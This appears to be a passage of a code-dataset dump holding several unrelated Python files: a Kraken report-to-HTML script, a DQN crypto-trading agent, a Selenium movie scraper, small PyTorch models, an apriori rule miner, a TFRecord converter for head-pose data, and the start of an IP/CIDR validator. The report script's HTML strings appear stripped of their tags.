:#https://github.com/dbohdan/csv2html?fbclid=IwAR0L3a41xXXVpWXxH-q-httRuB1x-6S6KXQysBAx5dGhBaE3Ntg6WkVs7yc\ntable = \"\"\nnargs = len(sys.argv)\nwith open(kraken, 'rb') as tsvfile :\n\tcsv_table=pd.read_table(tsvfile , sep='\\t')\n\tcsv_table.columns =['Percentage of reads covered by the clade rooted at this taxon' ,'Number of reads covered by the clade rooted at this taxon','Number of reads assigned directly to this taxon','Rank code','NCBI taxonomy ID','scientific name']\t\n #convert tsv to csv first\n\t\n\tcsv_table.to_csv('kraken.csv.tmp' )\t\n\t#print (csv_table)\n\ttable = \"\"\n\twith open('kraken.csv.tmp', 'rb') as csvfile:\n\t\t\n\t\treader = csv.reader(csvfile , delimiter=',')\n\t\t#print (reader)\n\n\t\ttable += \"\\n\"\n\t\tfor row in reader:\n\t\t\ttable += \"\\n\" + \"\".join([\"\\n\" % \n\t\t\t\t item for item in row]) + \"\\n\"\n\t\ttable += \"
<td>%s</td>\\n\" % \n\t\t\t\t item for item in row]) + \"</tr>\\n\"\n\t\ttable += \"</table> \\n\"\n\n\t# convert csv to html\n\tif nargs > 2:\n\t\twith open(sys.argv[6], 'w') as htmlfile:\n\t\t\thtmlfile.write(table)\n\t\t\t#print type (htmlfile)\n\t\t\n\telse:\n\t\toutput_file.write(table)\n# print (table)\n\n#URL = \"input file name is \" % kraken\n#print (URL)\n#message = \"\"\n#new_message = message.format(URL=\"Kraken\")\n\n######################\"report\n#f = open ('final_report.html', \"w\")\n\n\nwith open(outputfileconcat , \"w\") as f :\n\tmessage1 = \"\"\"<html>\n <head>\n </head>\n <body>\n <h1>General report</h1>\n\t<b>Outputfile name : \"\"\"\n\t\n\tmessage2 = outputfileconcat\n\t\n\tmessage3 = \"\"\"</b>\n <br>\n <b>Input file name</b>\n\t\n <br>\n <h2>Interactive visualisation of taxa relative abundance by Krona</h2>\n <br>\n <b>Krona result are displayed here :</b>\n krona \n\t\t\n <br>\n <h2>Best Hits</h2>\n <br>\n <br>\n <br>\n <br>\n <h2>kraken_report</h2>\n <br>\n <br>\n <br>\n </body>\n</html>
\n \n \"\"\"\n\tf.write(message1 + message2+ message3)\n\tf.close()\n\nfilenname = outputfileconcat\n\nwebbrowser.open_new_tab(filenname)\n\n\n","sub_path":"viraldetect/helpers/final_report.py","file_name":"final_report.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"570100461","text":"'''\nMint Agent, ycli\n[Requires utils_v2.py]\nBased on Vanilla DQ Agent. Changes include:\n1. Change neural network to 2 layers to overcome vanishing gradients. Also changed stddev in initialization.\n2. Require 'cash_supply' for __init__()\n3. Include 'seq_len' as an argument for __init__(). 'seq_len' is the number of hours the agent sees before making a decision. Defaults to 10.\n4. Change self.batch_size from 32 to 1800.\n5. Include 'USDT_BTC_open_label', 'USDT_BTC_pctChange_label', 'USDT_BTC_volatility_label' as state features. See utils_v2.py.\n6. Change self.env.getStates() to self.env.getStatesSequence(), which is a new method implemented in utils_v2.py\n7. Implement self.state_mean in __replay() for feature centering. Not sure if this is necessary. [problem: this is not saved with the model, so when you load the model later you lose this state_mean.]\n8. In __replay(), roll the reward column of self.memory for 9 hours. Note that this does not need to match seq_len.\n9. In train(), change reward definition to the percent change of portfolio value. This, with the rolling mentioned above, makes the reward the relative change in portfolio value of the 10th hour in the future with respect to the 9th hour in the future. (This is still not a natural reward function, right?)\n10. In test(), the model is not automatically loaded. Instead, load the model explicitly in your ipynb.\n11. In train() and test(), change the order of env.step() and portfolio.apply_action(). Step first.\n12. Changed keras implementation to tensorflow.\n13. 
Changed activation to leaky_relu !!!!!\n'''\n\nfrom importlib import reload\nimport utils_v2\nreload(utils_v2)\nfrom utils_v2 import *\n\nimport tensorflow as tf\n\n# from keras.models import Sequential\n# from keras.layers import Dense\n# from keras.optimizers import Adam\n# from keras import backend as K\n# from keras import initializers\n# from keras.models import load_model\n\n# Neural Network for the Q value approximation\nclass QValue_NN:\n def __init__(self, state_size, action_size, units):\n self._state_size = state_size\n self._action_size = action_size\n self._units = units\n self.__build_model()\n \n def __huber_loss(self, target, prediction):\n # sqrt(1+error^2)-1\n error = prediction - target\n return K.mean(K.sqrt(1+K.square(error))-1, axis=-1)\n\n def __build_model(self): # maybe fix random seed here\n \n self.X = tf.placeholder(tf.float32, [None, self._state_size])\n self.y = tf.placeholder(tf.float32, [None, self._action_size])\n a1 = tf.layers.dense(self.X, self._action_size, activation=tf.nn.leaky_relu) # first FC\n self.preds = tf.layers.dense(a1, self._action_size, activation=tf.nn.leaky_relu) # second FC\n self.loss = tf.nn.l2_loss(self.preds - self.y)\n optimizer = tf.train.AdamOptimizer(learning_rate=0.01) \n self.train_op = optimizer.minimize(self.loss)\n\n def train(self, session, state, qvalues):\n state_reshape = np.reshape(state, [1, len(state)])\n session.run(self.train_op, feed_dict={self.X: state_reshape, self.y:qvalues})\n\n def predict(self, session, state):\n state_reshape = np.reshape(state, [1, len(state)])\n return session.run(self.preds, feed_dict={self.X: state_reshape})\n \n# def set_weights(self, model_weights):\n# self._model.set_weights(model_weights)\n \n# def get_weights(self):\n# return self._model.get_weights()\n \n# def save(self, path):\n# self._model.save_weights(path)\n \n# def load(self, path):\n# self._model.load_weights(path)\n \n\nimport random\nimport numpy as np\nfrom collections import deque\nimport pandas as pd\n\n# Agent Implementation\nclass MintDQNAgent:\n \n # initialize internal variables\n def __init__(self, cash_supply, input_seq_len=10, gamma=0.95, num_neutron=24, epsilon_min = 0.001, epsilon_decay=0.995, \n coin_name='BTC', num_coins_per_order=1.0, recent_k = 0,\n external_states = external_state_list,\n internal_states = internal_state_list, verbose=False):\n self.max_mem_len = 2000\n self.memory = deque(maxlen=2000)\n self.batch_size = 1800\n self.gamma = gamma\n self.epsilon=1.0\n self.epsilon_min=epsilon_min \n self.epsilon_decay=epsilon_decay\n self.coin_name = coin_name\n # External states\n self.external_states = external_states\n self.env = Environment(coin_name=coin_name, states=external_states, recent_k=recent_k)\n # Internal states\n self.internal_states = internal_states\n self.portfolio = Portfolio(cash_supply=cash_supply, num_coins_per_order=num_coins_per_order, states=internal_states,\n verbose=verbose, final_price=self.env.getFinalPrice())\n # NN model\n _state_size = self.env.getStateSpaceSize()*input_seq_len + self.portfolio.getStateSpaceSize()\n tf.reset_default_graph()\n with tf.variable_scope(\"model\", initializer=tf.contrib.layers.xavier_initializer()) as scope:\n self.model = QValue_NN(_state_size, self.portfolio.getActionSpaceSize(), num_neutron)\n self.old_vars = {v.name.split('model/')[-1] : v for v in tf.trainable_variables() if v.name.startswith(scope.name + \"/\")}\n with tf.variable_scope(\"target_model\", initializer=tf.contrib.layers.xavier_initializer()):\n self.target_model = 
QValue_NN(_state_size, self.portfolio.getActionSpaceSize(), num_neutron)\n \n self.train_cum_returns = []\n \n self.test_cum_returns = []\n self.test_portfolio_values = []\n self.test_actions = []\n self.seq_len = input_seq_len\n \n self.state_mean = None\n \n def plot_external_states(self):\n self.env.plot(self.external_states)\n \n \n def __act(self, session, state):\n if np.random.rand() < self.epsilon:\n return random.choice(list(Action))\n act_values = self.model.predict(session, state)\n print(act_values)\n# if np.array_equal(act_values, np.array([[-1.0, -1.0, -1.0]])):\n# print(\"what???????????????????????????????????????\")\n# print(state)\n return Action(np.argmax(act_values[0]))\n \n def __remember(self, state, action, reward, next_state, isDone):\n self.memory.append((state, action, reward, next_state, isDone))\n \n def __update_target_model(self, sess):\n # self.target_model._model.set_weights(self.model._model.get_weights())\n with tf.variable_scope(\"target_model\", initializer=tf.contrib.layers.xavier_initializer()) as scope:\n# for v in tf.trainable_variables():\n# print(v.name)\n assignments = [v.assign(self.old_vars[v.name.split('model/')[-1]]) \\\n for v in tf.trainable_variables() if v.name.startswith(scope.name + \"/\")]\n sess.run(assignments)\n\n def print_my_memory(self):\n mem = list(self.memory)\n mem_str = []\n for s, a, r, s_, donzo in mem:\n mem_str += [\"%s_%s_%s_%s_%s\" % (str(s), str(a), str(r), str(s_), str(donzo))]\n \n uniques = list(set(mem_str))\n uniques.sort() \n \n for elem in uniques:\n print(elem)\n print(mem_str.count(elem))\n print(\"\\n\")\n \n def __replay(self, session, batch_size):\n # key: some delay here\n \n# print(self.memory[:,0])\n# print('mean state:', np.mean(self.memory[:,0]))\n \n self.memory = np.array(self.memory)\n self.memory[:,2] = np.roll(self.memory[:,2], -9, axis=0)\n self.memory = deque(self.memory[:-9,:], maxlen=self.max_mem_len)\n print(len(self.memory))\n minibatch = random.sample(self.memory, self.batch_size)\n \n for state, action, reward, next_state, isDone in minibatch:\n# state -= self.state_mean\n# next_state -= self.state_mean\n# print('state',state)\n target = self.model.predict(session, state)\n# print('target predict before action:', target)\n if isDone:\n target[0][action.value] = reward\n else:\n a = self.model.predict(session, next_state)[0]\n t = self.target_model.predict(session, next_state)[0]\n \n # Bellman Equation\n target[0][action.value] = reward + self.gamma * t[np.argmax(a)]\n# print('action:',action)\n# print('target predict after action:', target)\n# print('======')\n\n self.model.train(session, state, target)\n \n # update the epsilon to gradually reduce the random exploration\n if self.epsilon > self.epsilon_min:\n self.epsilon *= self.epsilon_decay\n\n # Agent Training\n \n ### Sample Usage:\n \n ### import datetime\n ### end = datetime.datetime(2018,1,1,0)\n ### agent.train(end_time = end)\n \n def train(self, session, end_time, num_episodes=100, start_time=None, verbose=True):\n session.run(tf.global_variables_initializer())\n self.cum_returns = []\n \n if start_time is None:\n start_time = self.env.start_index\n \n n_days = (end_time - start_time) // (self.env.time_delta * 24)\n print('Training from ', start_time, ' to', end_time, ': ', '~', n_days, 'days\\n')\n \n for i in range(num_episodes):\n \n self.env.reset()\n self.portfolio.reset()\n self.env.set_current_time(start_time)\n state = self.env.getStatesSequence() + self.portfolio.getStates()\n\n # walk through the environment\n # 
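# --- Illustrative sketch (editor addition, not a dataset record) ---
# The __replay() update above is the Double-DQN target: the online network
# chooses the next action, the target network scores it. In plain NumPy:
import numpy as np

def double_dqn_target(reward, q_next_online, q_next_target, gamma=0.95):
    a_star = int(np.argmax(q_next_online))         # action picked by online net
    return reward + gamma * q_next_target[a_star]  # value from target net

assert double_dqn_target(1.0, np.array([0.1, 0.9]),
                         np.array([0.5, 0.2])) == 1.0 + 0.95 * 0.2
# --- end sketch ---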
obtain action based on state values using the Neural Network model\n # collect reward\n # update the experience in Memory\n while (True):\n if verbose:\n print('Current time:', self.env.current_index)\n \n value_before_action = self.portfolio.getCurrentValue(self.env.getCurrentPrice())\n \n if self.state_mean is not None:\n action = self.__act(session, state - self.state_mean)\n else:\n action = self.__act(session, state)\n isDone, next_state = self.env.step(end_time) # order changed\n action = self.portfolio.apply_action(self.env.getCurrentPrice(), action, verbose)\n \n next_state = self.env.getStatesSequence() # mint\n next_state = next_state + self.portfolio.getStates()\n \n if self.state_mean is not None:\n next_state -= self.state_mean\n \n# reward = self.env.getReward(action) # this was used in vanilla\n reward = (self.portfolio.getCurrentValue(self.env.getCurrentPrice()) / value_before_action - 1) * 100\n if verbose:\n print(action, reward)\n print()\n \n self.__remember(state, action, reward, next_state, isDone)\n state = next_state\n \n if i == 0:\n # estimate state mean\n memory = np.array(self.memory)\n state_sum = 0\n for list_of_state in memory[:,0]:\n state_sum += np.array(list_of_state)\n self.state_mean = state_sum / len(memory)\n \n if isDone:\n self.__update_target_model(session)\n \n cum_return = self.portfolio.getReturnsPercent(self.env.getCurrentPrice())\n self.train_cum_returns.append(cum_return)\n \n print(\"episode: {}/{}, returns: {:.2}, epsilon: {:.2}\"\n .format(i+1, num_episodes, \n cum_return, \n self.epsilon))\n break\n \n # train the Neural Network incrementally with the new experiences\n if len(self.memory) > self.batch_size:\n self.__replay(session, self.batch_size)\n \n self.target_model.save('{}.model.h5'.format(self.coin_name))\n \n \n ### Sample Usage:\n \n ### import datetime\n ### start = datetime.datetime(2018,1,1,0)\n ### agent.test(start_time = start)\n \n def test(self, session, start_time, end_time=None, epsilon=None, verbose=True, print_freq='daily'):\n if epsilon is not None:\n self.epsilon = epsilon\n else:\n self.epsilon = 0 # set to 0, no randomness allowed \n \n self.env.reset()\n self.env.set_current_time(start_time)\n self.portfolio.reset()\n state = self.env.getStatesSequence() + self.portfolio.getStates()\n state -= self.state_mean\n# self.model.load('{}.model.h5'.format(self.coin_name))\n \n self.test_cum_returns = []\n self.test_portfolio_values = []\n self.test_actions = []\n \n if end_time is None or end_time >= self.env.end_index:\n end_time = self.env.end_index - self.env.time_delta\n \n n_days = (end_time - start_time) // (self.env.time_delta * 24)\n print('Testing from ', start_time, ' to', end_time, ': ', '~', n_days, 'days\\n')\n \n start_day = start_time.day\n verbose_g = verbose\n \n while (True):\n \n if verbose:\n if print_freq == 'hourly':\n print('Current time:', self.env.current_index)\n verbose = True\n if print_freq == 'daily':\n if self.env.current_index.hour == 0:\n print('Current time:', self.env.current_index)\n verbose = True\n else:\n verbose = False\n elif print_freq == 'weekly': \n if self.env.current_index.day in np.roll((np.arange(28)+1), 28-start_day+1)[::7] and self.env.current_index.hour == 0:\n print('Current time:', self.env.current_index)\n verbose = True\n else:\n verbose = False\n \n action = self.__act(session, state)\n isDone, next_state = self.env.step(end_time) # order changed\n action = self.portfolio.apply_action(self.env.getCurrentPrice(), action, verbose)\n \n next_state = 
self.env.getStatesSequence()\n next_state = next_state + self.portfolio.getStates()\n state = next_state\n state -= self.state_mean\n \n cum_return = self.portfolio.getReturnsPercent(self.env.getCurrentPrice())\n self.test_cum_returns.append(cum_return)\n \n portfolio_value = self.portfolio.getCurrentValue(self.env.getCurrentPrice())\n self.test_portfolio_values.append(portfolio_value)\n \n self.test_actions.append(action.value)\n \n verbose = verbose_g\n \n if isDone:\n break\n \n ts = self.env.df.ix[start_time:end_time].index\n self.test_cum_returns = pd.Series(self.test_cum_returns, index=ts)\n self.test_portfolio_values = pd.Series(self.test_portfolio_values, index=ts)\n self.test_actions = pd.Series(self.test_actions, index=ts)\n\n print('Percentage return:', self.portfolio.getReturnsPercent(self.env.getCurrentPrice()))\n \n def plot_action(self, start_time, end_time=None):\n import matplotlib.pyplot as plt\n \n if end_time is None: # default: one day\n end_time = start_time + self.env.time_delta * 24\n \n df = self.env.df\n df = df.loc[df.index >= start_time]\n df = df.loc[df.index <= end_time]\n prices = df['USDT_BTC_open']\n \n actions = self.test_actions\n actions = actions[actions.index >= start_time]\n actions = actions[actions.index < end_time]\n \n fig, ax1 = plt.subplots(figsize = (15, 8))\n \n ax1.plot(prices.index, prices, 'b-')\n ax1.set_ylabel('Price', color='b', fontsize=15)\n ax1.tick_params('y', colors='b', labelsize=15)\n \n hold = actions[actions == 1]\n buy = actions[actions == 2]\n sell = actions[actions == 0]\n \n ax2 = ax1.twinx()\n ax2.scatter(hold.index, hold, c='blue', label='HOLD')\n ax2.scatter(buy.index, buy, c='green', label='BUY')\n ax2.scatter(sell.index, sell, c='red', label='SELL')\n ax2.set_yticks([])\n ax2.legend(loc=1, fontsize=15)\n\n plt.xlim(actions.index[0], actions.index[-1]) \n\n plt.show()\n \n def plot_env(self, states_to_plot=None, start_time=None, end_time=None):\n self.env.plot(states_to_plot, start_time, end_time)\n \n def plot_portfolio(self, states_to_plot=None, start_time=None, end_time=None):\n self.portfolio.plot(states_to_plot, start_time, end_time)","sub_path":"Trading/RL/MintDQNAgent.py","file_name":"MintDQNAgent.py","file_ext":"py","file_size_in_byte":17400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"426139929","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport os\n\nfrom scraper.models_old import Movie\nfrom datetime import datetime\n\n\npath_module = os.path.dirname(os.path.abspath(__file__))\npath_chromedriver = os.path.join(path_module, 'chromedriver2.44.exe')\n\n\ndef get_movies_info(infos, session):\n \"\"\"\n parses movie information (title, genre, start_date) from a list\n of Tag div (class='product-info')\n\n :param infos: list of bs4.element.Tag('div') containing movie info\n :return:\n \"\"\"\n for info in infos:\n title = info.h2.string\n print(title)\n spans = info(name='span', class_='cgv-info-normal')\n # stripping whitespaces from beginning and end of result\n genre = spans[0].get_text(strip=True)\n start_date = spans[2].get_text(strip=True)\n start_date = datetime.strptime(start_date, '%d-%m-%Y').date() # convert to date obj\n # create record\n movie = Movie(title=title, genre=genre, start_date=start_date)\n session.add(movie)\n print('--------------')\n\n\ndef get_browser():\n # add args to tell Selenium to not actually open a window\n chrome_options = Options()\n 
chrome_options.add_argument('--headless')\n    chrome_options.add_argument('--window-size=1920x1080')\n    # open browser\n    browser = webdriver.Chrome(executable_path=path_chromedriver,\n                               chrome_options=chrome_options)\n    return browser\n\n\n","sub_path":"scraper/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"152755823","text":"\n\ndef weight_on_planets():\n    # takes weight as float variable\n    weight = float(input(\"What do you weigh on earth? \"))\n    #calculates and prints weight for Mars and Jupiter\n    print(\"\\nOn Mars you would weigh \" + str(weight * .38) + \" pounds.\\nOn Jupiter you would weigh \" + str(weight * 2.34) + \" pounds.\")\n\nif __name__ == '__main__':\n    weight_on_planets()","sub_path":"lab0-willski23/planets.py","file_name":"planets.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"172648895","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\nclass MLP(nn.Module):\n\tdef __init__(self, in_dim, out_dim, numlayer, numunit):\n\t\tsuper(MLP, self).__init__()\n\t\tin_sizes = [in_dim] + [numunit] * (numlayer - 1)\n\t\tout_sizes = [numunit] * numlayer\n\t\tself.layers = nn.ModuleList(\n\t\t\t[nn.Linear(in_size, out_size) for (in_size, out_size)\n\t\t\tin zip(in_sizes, out_sizes)])\n\t\tself.last_linear = nn.Linear(numunit, out_dim)\n\t\n\tdef forward(self, x):\n\t\tfor layer in self.layers:\n\t\t\tx = F.relu(layer(x))\n\t\tx = self.last_linear(x)\n\t\treturn x\n\nclass CNN(nn.Module):\n\tdef __init__(self, filtersize, stride, padsize, numchannel):\n\t\tsuper(CNN, self).__init__()\n\t\tself.layers = nn.ModuleList([ \\\n\t\t\tnn.Conv1d(in_channels=1, out_channels=numchannel, kernel_size=filtersize, stride=stride, padding=padsize), \\\n\t\t\tnn.Conv1d(in_channels=numchannel, out_channels=numchannel, kernel_size=filtersize, stride=stride, padding=padsize), \\\n\t\t\tnn.Conv1d(in_channels=numchannel, out_channels=numchannel, kernel_size=filtersize, stride=stride, padding=padsize), \\\n\t\t\tnn.Conv1d(in_channels=numchannel, out_channels=numchannel, kernel_size=filtersize, stride=stride, padding=padsize), \\\n\t\t\tnn.Conv1d(in_channels=numchannel, out_channels=numchannel, kernel_size=filtersize, stride=stride, padding=padsize), \\\n\t\t\tnn.Conv1d(in_channels=numchannel, out_channels=1, kernel_size=filtersize, stride=stride, padding=padsize) \\\n\t\t])\n\t\n\tdef forward(self, x):\n\t\tfor layer in self.layers:\n\t\t\tx = layer(x)\n\t\treturn x\n","sub_path":"06_speechparam_update/tool/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"263755506","text":"\r\nimport pandas as pd\r\nfrom mlxtend.frequent_patterns import association_rules, apriori\r\n\r\ndata=pd.read_excel('Clustering_train.xlsx')\r\n\r\nimport Transformation\r\nencode=Transformation.transformation(data,'InvoiceNo','Description')\r\n\r\nfrequent_itemsets = apriori(encode, min_support = 0.01, max_len = 2, use_colnames=True)\r\n # compute all association rules for frequent_itemsets\r\nAssociation_rule=association_rules(frequent_itemsets, metric=\"lift\", min_threshold=1)\r\n\r\n\r\nAssociation_rule['Antecedent_new'] = Association_rule.antecedents.map(lambda x : list(x)[0])\r\nAssociation_rule['Consequents_new'] = Association_rule.consequents.map(lambda x : 
list(x)[0])\r\n\r\nFinal_Rule=Association_rule[['Antecedent_new','Consequents_new','support','confidence','lift']].sort_values('lift', axis=0, ascending=False)\r\n\r\n","sub_path":"Apriori.py","file_name":"Apriori.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"596914698","text":"import time,sys\nfrom tqdm import tqdm\nfrom time import sleep\ndef process_Shape():\n\tprint('Downloading...')\n\tfor i in range(11):\n\t\tif i!=10:\n\t\t\tsys.stdout.write('==')\n\t\telse:\n\t\t\tsys.stdout.write('=='+str(i*10)+'%')\n\t\tsys.stdout.flush()\n\t\ttime.sleep(0.5)\n\tprint('\\nDownload complete')\n\n\ndef shape():\n\tfor i in tqdm(range(10)):\n\t\tsleep(0.5)\n\t\n\n\n\nif __name__ == '__main__':\n\tprocess_Shape()\n\tshape()","sub_path":"process_shape.py","file_name":"process_shape.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"234774895","text":"from orthogonalization import orthogonalize, aug_orthogonalize\nfrom vec import Vec\nfrom matutil import coldict2mat, mat2rowdict\nfrom math import sqrt\n\ndef normalize(v):\n    '''\n    Input: a Vector v to be normalized\n    Output: the Vector v scaled to unit length\n    '''\n    return v/sqrt(v*v)\n\ndef orthonormalize(L):\n    '''\n    Input: a list L of linearly independent Vecs\n    Output: A list T of orthonormal Vecs such that for all i in [1, len(L)],\n        Span L[:i] == Span T[:i]\n    '''\n    return [normalize(v) for v in orthogonalize(L)]\n\ndef djust(v, multipliers):\n    '''\n    input: a Vec with domain {0, 1, 2, . . . , n − 1} and an n-element list multipliers of scalars\n    output: a Vec w with the same domain as v such that w[i] = multipliers[i]*v[i]\n    '''\n    return Vec(v.D, {i:multipliers[i]*v[i] for i in v.D})\n\ndef aug_orthonormalize(L):\n    '''\n    Input:\n        - L: a list of Vecs\n    Output:\n        - A pair Qlist, Rlist such that:\n            * coldict2mat(L) == coldict2mat(Qlist) * coldict2mat(Rlist)\n            * Qlist = orthonormalize(L)\n    '''\n    Qlist = list()\n    Rlist = list()\n    normlist = list()\n    vstarlist, sigma_vecs = aug_orthogonalize(L)\n\n    for vstar,sigma_vec in zip(vstarlist,sigma_vecs):\n        q = normalize(vstar)\n        normlist.append(sqrt(vstar*vstar))\n        Qlist.append(q)\n        Rlist.append(sigma_vec)\n\n    for r in range(len(Rlist)):\n        for k in Rlist[r].D:\n            Rlist[r][k] = normlist[k] * Rlist[r][k]\n    return (Qlist, Rlist)\n\n","sub_path":"orthonormalization.py","file_name":"orthonormalization.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"593512887","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport glob\nimport tensorflow as tf\nimport numpy as np\nfrom tqdm import tqdm\nfrom torchvision import transforms\nimport torch\nfrom gen_tfrecords.BIWI import BIWI\n\ndef _int64_feature(value):\n    return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\ndef _bytes_feature(value):\n    return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\ndef _floats_feature(value):\n    return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))\n\ndef convert_to(images, labels_yaw, labels_pitch, labels_roll,\n               labels_yaw_cont, labels_pitch_cont, labels_roll_cont, genders, identities,\n               name, directory):\n    if images.shape[0] != labels_yaw.shape[0]:\n        raise ValueError('Images size %d does not match labels size %d.' 
%\n (images.shape[0], labels_yaw.shape[0]))\n num_examples = images.shape[0]\n height = images.shape[1]\n width = images.shape[2]\n nchannel = images.shape[3]\n\n filename = os.path.join(directory, '{}.tfrecords'.format(name))\n print('Writing', filename)\n writer = tf.python_io.TFRecordWriter(filename)\n for index in range(num_examples):\n image_raw = images[index].astype(np.float32).tostring()\n label_yaw = labels_yaw[index].astype(np.float32)\n label_pitch = labels_pitch[index].astype(np.float32)\n label_roll = labels_roll[index].astype(np.float32)\n label_yaw_cont = labels_yaw_cont[index].astype(np.float32)\n label_pitch_cont = labels_pitch_cont[index].astype(np.float32)\n label_roll_cont = labels_roll_cont[index].astype(np.float32)\n gender = genders[index].astype(np.int32)\n identity = identities[index].astype(np.int32)\n example = tf.train.Example(features=tf.train.Features(feature={\n 'height': _int64_feature(height),\n 'width': _int64_feature(width),\n 'nchannel': _int64_feature(nchannel),\n 'label_yaw_raw': _floats_feature(label_yaw),\n 'label_pitch_raw': _floats_feature(label_pitch),\n 'label_roll_raw': _floats_feature(label_roll),\n 'label_yaw_cont_raw': _floats_feature(label_yaw_cont),\n 'label_pitch_cont_raw': _floats_feature(label_pitch_cont),\n 'label_roll_cont_raw': _floats_feature(label_roll_cont),\n 'gender': _int64_feature(gender),\n 'identity': _int64_feature(identity),\n 'image_raw': _bytes_feature(image_raw)\n }))\n writer.write(example.SerializeToString())\n writer.close()\n\nif __name__ == \"__main__\":\n #transformations = transforms.Compose([transforms.Scale(240),\n #transforms.RandomCrop(224), transforms.ToTensor(),\n #transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n transformations = transforms.Compose([transforms.Scale(240), transforms.CenterCrop(224), transforms.ToTensor()])\n\n pose_dataset = BIWI('/home/wuzhenyu_sjtu/deep-head-pose/BIWI/hpdb',\n '/home/wuzhenyu_sjtu/deep-head-pose/BIWI/test_filename_list', transformations)\n\n train_loader = torch.utils.data.DataLoader(dataset=pose_dataset, batch_size=1, shuffle=True,\n drop_last=False, num_workers=1)\n\n arr_image, arr_label_yaw, arr_label_pitch, arr_label_roll = [], [], [], []\n arr_label_yaw_cont, arr_label_pitch_cont, arr_label_roll_cont = [], [], []\n arr_gender, arr_identity = [], []\n for i, (images, labels, cont_labels, gender, identity) in enumerate(train_loader):\n images = np.transpose(images.cpu().numpy(), [0, 2, 3, 1])\n labels = labels.cpu().numpy()\n cont_labels = cont_labels.cpu().numpy()\n gender = gender.cpu().numpy()\n identity = identity.cpu().numpy()\n\n # Binned labels\n label_yaw = labels[:, 0][0]\n label_pitch = labels[:, 1][0]\n label_roll = labels[:, 2][0]\n\n # Continuous labels\n label_yaw_cont = cont_labels[:, 0][0]\n label_pitch_cont = cont_labels[:, 1][0]\n label_roll_cont = cont_labels[:, 2][0]\n #print(label_yaw, label_pitch, label_roll)\n #print(label_yaw_cont, label_pitch_cont, label_roll_cont)\n #print(label_yaw.shape, label_pitch.shape, label_roll.shape)\n #print(label_yaw_cont.shape, label_pitch_cont.shape, label_roll_cont.shape)\n #print(images)\n print('Sample [%d/%d] ' % (i + 1, len(pose_dataset)))\n\n arr_image.append(np.squeeze(images))\n arr_label_yaw.append(np.asscalar(label_yaw))\n arr_label_pitch.append(np.asscalar(label_pitch))\n arr_label_roll.append(np.asscalar(label_roll))\n arr_label_yaw_cont.append(np.asscalar(label_yaw_cont))\n arr_label_pitch_cont.append(np.asscalar(label_pitch_cont))\n 
arr_label_roll_cont.append(np.asscalar(label_roll_cont))\n arr_gender.append(np.asscalar(gender[:, 0]))\n arr_identity.append(np.asscalar(identity[:, 0]))\n #print(arr_gender)\n #print(arr_identity)\n if (i+1) % 1000 == 0:\n convert_to(np.asarray(arr_image), np.asarray(arr_label_yaw), np.asarray(arr_label_pitch), np.asarray(arr_label_roll),\n np.asarray(arr_label_yaw_cont), np.asarray(arr_label_pitch_cont), np.asarray(arr_label_roll_cont),\n np.asarray(arr_gender), np.asarray(arr_identity),\n name='testing_{}'.format(i), directory='tfrecords')\n arr_image, arr_label_yaw, arr_label_pitch, arr_label_roll = [], [], [], []\n arr_label_yaw_cont, arr_label_pitch_cont, arr_label_roll_cont = [], [], []\n arr_gender, arr_identity = [], []\n convert_to(np.asarray(arr_image), np.asarray(arr_label_yaw), np.asarray(arr_label_pitch), np.asarray(arr_label_roll),\n np.asarray(arr_label_yaw_cont), np.asarray(arr_label_pitch_cont), np.asarray(arr_label_roll_cont),\n np.asarray(arr_gender), np.asarray(arr_identity),\n name='testing_{}'.format(len(pose_dataset)), directory='tfrecords')","sub_path":"legacy/AFLW/gen_tfrecords/convert2records_BIWI.py","file_name":"convert2records_BIWI.py","file_ext":"py","file_size_in_byte":6133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"638783728","text":"import socket\r\nimport sys\r\nimport ipaddress\r\nimport re\r\nimport json\r\nfrom socket import inet_ntoa\r\nfrom struct import pack\r\ndef change_to_int(adres):\r\n\ta,b,c,d = adres.split(\".\")\r\n\ta = int(a)\r\n\tb = int(b)\r\n\tc = int(c)\r\n\td = int(d)\r\n\tip = [a,b,c,d]\r\n\treturn ip\r\ndef format_validator (adres):\r\n\tmatch = re.search(r'^\\d{1,}.\\d{1,}.\\d{1,}.\\d{1,}/\\d{1,}$', adres)\r\n\tif(match):\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n\t\t\r\ndef address_validator (adres, maska):\r\n\tzwracane = True\r\n\tadres = change_to_int(adres)\r\n\tmaska = int(maska)\r\n\tif(adres[0] >=0 and adres[0] <=255 and adres[1]>=0 and adres[1]<=255 and adres[2]>=0 and adres[2]<=255 and adres[3]>=0\\\r\n\tand adres[3]<=255 and maska >=0 and maska <=32):\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n\t\t\r\ndef cidr_mask(cidr):\r\n\tcidr = int(cidr)\r\n\tmask = (0xffffffff >> (32 - cidr)) << (32 - cidr)\r\n\treturn (str( (0xff000000 & mask) >> 24) + '.' +\r\n str( (0x00ff0000 & mask) >> 16) + '.' +\r\n 